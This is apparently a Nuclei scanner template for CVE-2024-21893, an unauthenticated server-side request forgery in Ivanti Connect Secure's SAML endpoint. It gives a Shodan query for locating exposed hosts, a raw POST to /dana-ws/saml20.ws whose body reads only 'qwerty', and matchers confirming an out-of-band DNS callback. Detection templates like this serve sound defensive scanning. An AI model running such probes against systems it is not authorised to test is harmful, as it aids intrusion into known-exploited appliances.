id: CVE-2024-21893 info: name: Ivanti SAML - Server Side Request Forgery (SSRF) author: DhiyaneshDk severity: high description: | A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. reference: - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2 - https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887 - https://github.com/Ostorlab/KEV classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2024-21893 cwe-id: CWE-918 epss-score: 0.96139 epss-percentile: 0.99473 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: "connect_secure" shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,kev,ssrf,ivanti http: - raw: - | POST /dana-ws/saml20.ws HTTP/1.1 Host: {{Hostname}} qwerty matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: body words: - '/dana-na/' - 'WriteCSS' condition: and # digest: 490a0046304402200a0547b87f667aa36af039f186372735c368c54758d1da68f5b0fd18312a8c0402201944364cc59a7b39458b86b84369d97aa826d793c83d4c42fed8f694a87920be:922c64590222798bb761d5b6d8e72950